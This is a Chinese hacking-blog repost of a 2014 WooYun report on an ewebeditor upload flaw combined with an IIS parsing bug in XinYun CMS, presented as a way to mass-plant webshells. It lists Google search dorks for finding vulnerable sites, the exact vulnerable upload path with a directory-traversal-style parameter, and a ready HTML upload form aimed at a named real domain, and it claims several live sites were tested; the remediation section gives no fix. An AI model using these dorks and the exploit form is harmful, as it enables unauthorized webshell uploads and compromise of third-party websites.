记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

2014-12-20 18:01

新云cms建站系统存在ewebeditor上传和iis解析漏洞,可批量getshell.

利用ewebeditor上传漏洞可以新建一个1.asp的文件夹,再配合iis的解析漏洞就可以成功的拿到shell.

可通过谷歌获得大量的漏洞网站,关键字如下:

inurl:Showservices.asp?id=

inurl:showkbxx.asp?id=



code 区域
可通过谷歌获得大量的漏洞网站,关键字如下:

inurl:Showservices.asp?id=

inurl:showkbxx.asp?id=



QQ图片20140924150735.jpg



QQ图片20140924143112.jpg







code 区域
问题网址出现在:/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp



code 区域
构造表单上传..EXP如下:<form action="http://www.zenitsoft.com//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.php"

method=post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=upload>

</form>



code 区域
以下网站都存在漏洞



QQ图片20140924143112.jpg

漏洞证明:

code 区域
通过构造的表单上传后,查看源代码,可直接看到上传后的路径



code 区域
以下测试了几个网站作证明





QQ图片20140924145219.jpg



QQ图片20140924145233.jpg



QQ图片20140924145245.jpg



修复方案:

你们有专业人员,懂得!

知识来源: www.wooyun.org/bugs/wooyun-2014-077161

阅读:313980 | 评论:0 | 标签:cms 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云